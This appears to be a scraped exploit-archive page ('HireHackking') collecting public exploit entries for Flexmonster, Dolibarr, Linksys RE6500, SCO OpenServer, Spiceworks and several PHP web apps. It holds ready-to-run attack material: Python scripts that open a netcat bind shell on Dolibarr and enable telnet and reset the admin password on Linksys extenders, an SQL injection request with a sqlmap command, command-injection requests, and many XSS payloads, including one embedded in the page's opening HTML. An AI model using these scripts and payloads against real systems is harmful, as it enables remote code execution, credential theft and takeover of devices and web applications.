</td> </tr> </table> </td> </tr> </table> <!--/htdig_noindex--> <!-- End DocView navigation toolbar --> <h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE> </PRE> </body></html>
HireHackking
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20142 Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17. Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteCSV")><!--
HireHackking
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20140 Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17 Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteReport")><!--
HireHackking
# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version: Flexmonster Pivot Table & Charts 2.7.17 # Tested on: Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20139 Cross Site Scripting (XSS) vulnerability in the Remote JSON component Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteJSON")><!--
HireHackking

Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated) # Date: 2020.12.17 # Exploit Author: Yilmaz Degirmenci # Vendor Homepage: https://github.com/Dolibarr/dolibarr # Software Link: https://sourceforge.net/projects/dolibarr/ # Version: 12.0.3 # Tested on: Kali Linux 2020.2 # Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is # vulnerable to authenticated Remote Code Execution Attack. An attacker who # has the access the admin dashboard can manipulate the backup function by # inserting payload into the zipfilename_template parameter at page # /admin/tools/dolibarr_export.php by clicking on the button "Generate # Backup" thus triggering command injection on target system. import requests from bs4 import BeautifulSoup from bs4 import Comment import re import lxml import json import urllib username = input("username: ") password = input("password: ") root_url = input("Root URL: http://192.168.0.15/ --> ") print("Exploit is sent! Check out if the bind shell on port 9999 active!") listener_port = "9999" login_url = root_url + "/index.php?mainmenu=home " vulnerable_url = root_url + "/admin/tools/dolibarr_export.php" upload_url = root_url + "/admin/tools/export_files.php" session = requests.Session() request = session.get(login_url) # Get the token value soup = BeautifulSoup(request.text,"lxml") token = soup.find("input",{'name':'token'})['value'] # Login body = {"token":token, "actionlogin":"login", "loginfunction":"loginfunction", "tz":"-5", "tz_string":"America%2FNew_York", "dst_observed":"1", "dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second": "2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664", "dol_hide_topmenu":"", "dol_hide_leftmenu":"", "dol_optimize_smallscreen":"", "dol_no_mouse_hover":"", "dol_use_jmobile":"", "username":username,"password":password} session.post(login_url, data=body, cookies=request.cookies) request = session.get(vulnerable_url) token = soup.find("input",{'name':'token'})['value'] header = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0", "Accept":"*/", "Accept-Encoding": "gzip, deflate", "Origin": root_url, "Referer": root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools", "Upgrade-Insecure-Requests": "1" } body = {"token":token, "export_type":"server", "page_y":"1039", "zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar --use-compress-program='nc -c bash -nlvp 9999' %0a :: ", "compression":"gz"} param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote) session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
HireHackking

Content Management System 1.0 - 'email' SQL Injection

HACKER · %s · %s

# Exploit Title: Content Management System 1.0 - 'email' SQL Injection # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: WINDOWS 10 Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login" page in burpsute Step 2. Save POST the packet Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs " Step 4. This will inject successfully and you will have an information disclosure of all databases contents POST the packet --- POST /ajax.php?action=login HTTP/1.1 Host: 10.211.55.4 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 61 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 Origin: http://10.211.55.4 Referer: http://10.211.55.4/login.php X-Requested-With: XMLHttpRequest Accept-Encoding: gzip email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123 --- SQLMAP --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND 'WlxU'='WlxU&password=admin123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM (SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123 ---
HireHackking

Linksys RE6500 1.0.11.001 - Unauthenticated RCE

HACKER · %s · %s

# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE # Date: 31/07/2020 # Exploit Author: RE-Solver # Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4 # Vendor Homepage: www.linksys.com # Version: FW V1.05 up to FW v1.0.11.001 # Tested on: FW V1.05 up to FW v1.0.11.001 # Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE # Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. # An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. #!/usr/bin/env python from requests import Session import requests import os print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.") print("Tested on FW V1.05 up to FW v1.0.11.001") print("RE-Solver @solver_re") ip="192.168.1.226" command="nvram_get Password >/tmp/lastpwd" #save device password; post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r= s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Prev password saved in /tmp/lastpwd") command="busybox telnetd" #start telnetd; post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r=s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Telnet Enabled") #set admin password post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" url_codeinjection="http://"+ip+"/goform/setSysAdm" s = requests.Session() s.headers.update({'Origin': "http://"+ip}) s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) r=s.post(url_codeinjection, data=post_data) if r.status_code == 200: print("[+] Prevent corrupting nvram - set a new password= admin")
HireHackking

Queue Management System 4.0.0 - "Add User" Stored XSS

HACKER · %s · %s

# Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-21 # Google Dork: N/A # Vendor Homepage: http://codekernel.net/ # Software Link: https://codecanyon.net/item/queue-management-system/22029961 # Affected Version: Version 4.0.0 # Patched Version: Unpatched # Category: Web Application # Tested on: Kali Linux Step 1. Login as admin. Step 2. Select "Users" from menu and click on "Add User . Step 3. Insert payload - "><svg/onload=alert(1)> in "Firtst Name" , " Last Name "and " Email ". Step 4. Now open "User List " from menu and you will get alert box.
HireHackking
# Exploit Title: Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-18 # Vendor Homepage: https://xeroneit.net/ # Software Link: https://xeroneit.net/portfolio/library-management-system-lms # Affected Version: Version 3.1 # Tested on: Kali Linux Step 1. Login to the application as Admin. Step 2. Select "Book" from menu and click on "Book Category" . Now , click on "Add" Button. Step 3. Insert payload - "><img src onerror=alert(1)> , in "Category Name" and Save it. Step 4. Now you will see an alert box .
HireHackking

Academy-LMS 4.3 - Stored XSS

HACKER · %s · %s

# Exploit Title: Academy-LMS 4.3 - Stored XSS # Date: 19/12/2020 # Vendor page: https://academy-lms.com/ # Version: 4.3 # Tested on Win10 and Google Chrome # Exploit Author: Vinicius Alves # XSS Payload: </script><svg onload=alert();> 1) Access LMS and log in to admin panel 2) Access courses page 3) Open course manager and SEO menu 4) Paste the XSS Payload tag and Submit 5) Access the course page on frontend 6) Trigged!
HireHackking

SCO Openserver 5.0.7 - 'outputform' Command Injection

HACKER · %s · %s

# Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection # Google Dork: inurl:/cgi-bin/manlist?section # Discovered Date: 04/09/2020 # Author: Ramikan # Vendor Homepage: https://www.xinuos.com/products/ # Software Link: https://www.sco.com/products/openserver507/-overview # Affected Version: Tested on 5.0.7, 6 can be affected on other versions. # Tested on: SCO Openserver 5.0.7 & version 6 # CVE : CVE-2020-25494 ************************************************************************************************************************************* Vulnerability :OS Command Injection ************************************************************************************************************************************* The outputform, toclevels parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed. The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name. Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request. Affected URL:http://host:8457/cgi-bin/printbook Affected Paramenter: outputform, toclevels ************************************************************************************************************************************* POC ************************************************************************************************************************************* Request: ************************************************************************************************************************************* POST /cgi-bin/printbook HTTP/1.1 Host: 10.0.0.45:8457 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.45:8457/en/Navpages/printmap.html Content-Type: application/x-www-form-urlencoded Content-Length: 118 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS. ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.1 200 OK Date: Tue, 04 Sep 2020 11:17:52 GMT Server: Apache/1.3.33 (Unix) mod_perl/1.29 Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 3188
HireHackking

Spiceworks 7.5 - HTTP Header Injection

HACKER · %s · %s

# Exploit Title: Spiceworks 7.5 - HTTP Header Injection # Google Dork: inurl:/pro_users/login # Discovered Date: 15/09/2020 # Exploit Author: Ramikan # Vendor Homepage: https://www.spiceworks.com # Affected Version: 7.5.7.0 may be others. # Tested On Version: 7.5.7.0 # CVE : CVE-2020-25901 Vulnerability: Host Header Injection Description: Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack. Request: GET / HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""} Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 302 Found Date: Tue, 15 Sep 2020 12:46:52 GMT Cache-Control: no-cache X-Runtime: 0 Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly Location: http://google.com/pro_users/login Content-Length: 99 Connection: close Content-Type: text/html; charset=utf-8 <html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html> Request:2 GET /pro_users/login HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""} Upgrade-Insecure-Requests: 1 Response:2 (Forgot your password)Link replaced with domain in the header. HTTP/1.1 200 OK Date: Tue, 15 Sep 2020 12:48:26 GMT Cache-Control: private, max-age=0, must-revalidate X-UA-Compatible: IE=edge,chrome=1 X-Runtime: 0 ETag: "77c8f98180ec3f6d4f2fcc8dcd796462" Set-Cookie: compatibility_test=testing; path=/ Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly Content-Length: 9875 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html lang="en" class="no-js desktop"> <head> <meta charset="utf-8" /> <title>Spiceworks</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="author" content="Spiceworks, Inc." /> <meta name="description" content="Network management made simple" /> <meta name="version" content="unknown" /> <noscript> <meta http-equiv="refresh" content="2;url=/sessions/incompatible" /> </noscript> <link href="/assets/sui.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/base.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/application.css?7500070" media="all" rel="stylesheet" type="text/css" /> <!--[if IE]><link href="/stylesheets/hacks.ie.css?7500070" media="all" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 7]><link href="/stylesheets/hacks.ie7.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 8]><link href="/stylesheets/hacks.ie8.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <link href="/stylesheets/print.css?7500070" media="print" rel="stylesheet" type="text/css" /> <link href="/assets/sui-print.css?7500070" media="print" rel="stylesheet" type="text/css" /> <link href="/assets/wizard.css?7500070" media="screen" rel="stylesheet" type="text/css" /> <script src="/assets/sui_bundle.js?7500070" type="text/javascript"></script> <script type="text/javascript"> //<![CDATA[ var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-314222-21']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); _gaq.push(['_setCustomVar', 1, '_v', '7.5.00070', 3]); _gaq.push(['_setCustomVar', 2, '_d', 'xl', 3]); _gaq.push(['_setCustomVar', 3, '_u', '2', 3]); _gaq.push(['_setCustomVar', 4, '_ul', 'anonymous', 2]); _gaq.push(['_setCustomVar', 5, '_m', 'anonymous', 2]); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //]]> </script> <script type="text/javascript"> //<![CDATA[ SPICEWORKS.ready(function(){ SPICEWORKS.fire('app:ready'); }); document.observe('dom:loaded', function(){ SPICEWORKS.fire('ready'); }); //]]> </script> <script type="text/javascript"> //<![CDATA[ (function($){ $(document).ready(function(){ $('#flash-notice-message').delay(9000).slideUp(300); }); })(jQuery); //]]> </script> <script type="text/javascript"> //<![CDATA[ var gekko = gekko || {}; gekko.cmd = gekko.cmd || []; gekko.times = gekko.times || []; gekko.times.push({ gekkoRequest: new Date().getTime() }); gekko.client = gekko.client || {}; gekko.client.app = { 'id': 'SWD', 'env': 'p', 'version': '7.5.00070' }; gekko.client.user = {}; gekko.client.user.uuid = 'b7f707b6-f574-44bb-a766-986fc5851a03'; //]]> </script> <script async="false" src="//gekko.spiceworks.com/gekko.js" type="text/javascript"></script> <script async="true" type='text/javascript' src='//www.googletagservices.com/tag/js/gpt.js'></script> <script type="text/javascript"> //<![CDATA[ gekko.cmd.push({cmd: function() { gekko.setAnalytics('_v', '7.5.00070'); }, important: true}); //]]> </script> <script> var SWUFR = SWUFR || {}; SWUFR.cmd = SWUFR.cmd || []; </script> <script async src="//gekko.spiceworks.com/swufr.js"></script> <script> SWUFR.cmd.push(function() { SWUFR.ufr.installed() }); </script> </head> <!--[if lt IE 7]> <body class="left-registerlogin-desktop sui-opt-in ie ie6 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 7]> <body class="left-register login-desktop sui-opt-in ie ie7 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 8]> <body class="left-register login-desktop sui-opt-in ie ie8 lte9 lte8 desktop"> <![endif]--> <!--[if IE 9]> <body class="left-register login-desktop sui-opt-in ie ie9 lte9 desktop"> <![endif]--> <!--[if !IE]><!--> <body class="left-register login-desktop sui-opt-in no-ie desktop"> <!--<![endif]--> <header class="site-navigation sui-opt-in"> <nav class="global-nav affix" data-navbar="global" data-search-autocomplete-min-length=""> <div class="nav-fluid-container"> <a href="/" class="global-nav_brand">Home</a> <img src="//static.spiceworks.com/assets/masthead/print_logo.png" class='global-nav_print-logo' /> </div> </nav> </header> <!--[if lte IE 9]> <div class="modal hide has-footer-in-body" data-backdrop="true" data-isdraggable="false" data-keyboard="false" id="install_chrome_frame"><div class="modal-header"> <h3>I'm gonna have to go ahead and ask you to use a different browser.</h3></div><div class="modal-body"> <img id="lumberg" src="/images/other/yeeeaaah.png" style="float:left; width:200px; "> <div class="sui-opt-in" id="chrome_frame_install" style="padding-left: 10px; overflow:hidden; min-height:150px"> <p style="padding-top:10px; font-size:13px">Yeaaaah… what's happening? </p> <p>We went ahead and stopped supporting Internet Explorer 9 and older in the Spiceworks app (IE10+ is now required), so if you could just go ahead and upgrade IE, that would be great… </p> <p style="padding-top:10px; font-size:11px; color: #AAA;">(Doesn't take long to install, and makes Spiceworks so much faster!)</p> </div> <div class="sui-opt-in" id="chrome_frame_reload" style="padding-left: 10px; overflow:hidden;"> <h4 class=""> <strong> Whoops, looks like you might have gotten stuck. </strong> </h4> </div> <div class="footer-actions blue-permission-granted"> <a class="sui-bttn ieUpgrade" href="#" id="ieUpgrade" onclick=" upgradeIE(); ; return false;">Upgrade Internet Explorer</a> </div> </div></div> <script type="text/javascript"> //<![CDATA[ jQuery(function(){ SPICEWORKS.stats.record("chrome_frame_prompt_shown", {category: 'unsupported_ie'}); jQuery('#install_chrome_frame').modal(); }) function upgradeIE(){ SPICEWORKS.stats.record("installed_newer_ie", {category: 'unsupported_ie'}); window.location.href = "http://windows.microsoft.com/en-US/internet-explorer/download-ie"; } //]]> </script> <![endif] --> <div class="sui-fluid-container"> <div id="content"> <img alt="Startup-bg" id="bg" src="/images/wizard/startup-bg.png?7500070" /> <div id="container"> <div id="wrapper"> <div id="float-msg"> <h1>Spiceworks is ready to rock!</h1> <p>Please enter your login credentials.</p> </div> <div class="main-outer-border"><div class="main-inner-border"><div class="main-header logo"><h1><img alt="Spiceworks" class="logo" src="/images/logos/large.png?7500070" /></h1><div class="shadow-line ">&nbsp</div> </div><div class="main"> <div id="flash-container-for-sessions-new"> </div> <form accept-charset="UTF-8" action="/pro_users/login" class="form-horizontal login" id="login_form" method="post"><div style="margin:0;padding:0;display:inline"><input name="authenticity_token" type="hidden" value="r+sYwqxdzOJAV6XSoVaYQ4HObg5uTfHFjtuDg3ZmH9k=" /></div><div style="margin:0;padding:0;display:inline;"><input name="_pickaxe" type="hidden" value="⸕" /></div> <div class=" control-group"><label for="pro_user_email">Email</label><div class="controls"><input id="pro_user_email" label="Email" name="pro_user[email]" size="30" type="text" /><span class="help-inline"></span></div></div> <div class=" control-group"><label for="pro_user_password">Password</label><div class="controls"><input id="pro_user_password" label="Password" name="pro_user[password]" size="30" type="password" /><span class="help-inline"></span></div></div> <div class="control-group controls forgot_password"> <a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a> </div> <div class=" control-group"><div class="controls"> <label class='checkbox'> <input name="pro_user[remember_me]" type="hidden" value="0" /><input id="pro_user_remember_me" name="pro_user[remember_me]" type="checkbox" value="1" /> Stay logged in </label> </div></div> <div class=" control-group"><div class="controls"> <button class="sui-bttn-primary sui-bttn " data-button-type="submit" data-primary="true" type="submit">Log in</button> </div></div> </form> </div></div></div> </div> </div> </div> </div> <div id="footer"> <hr/> <span class="pull-left"> <p>Copyright &copy; 2006-16 Spiceworks, Inc.</p> </span> <span class="pull-right"> <p> <a href="https://www.spiceworks.com/about/">About</a> &bull; <a href="https://www.spiceworks.com/privacy/">Privacy</a> &bull; <a href="https://www.spiceworks.com/terms/">Terms</a> &bull; <a href="https://community.spiceworks.com/support?utm_campaign=app_help&utm_medium=app&utm_source=app_ui">Help</a> </p> </span> </div> <script src="/assets/wizard.js?7500070" type="text/javascript"></script> </body> </html>
HireHackking

Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS

HACKER · %s · %s

# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20141 Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17. Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OLAPTool")><!--
HireHackking

Point of Sale System 1.0 - Multiple Stored XSS

HACKER · %s · %s

# Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-18 # Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html # Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Suppliers" in header and select "Add Supplier". Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form. Note: Stored XSS vulnerability can also be found "Customers Page" when you select "Add New Customer". Apply Same method above to execute Stored XSS. Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Suppliers Page", your XSS Payloads will be triggered. Note: Stored XSS can also be triggered when you click on "Products Page" and select "Add New Product".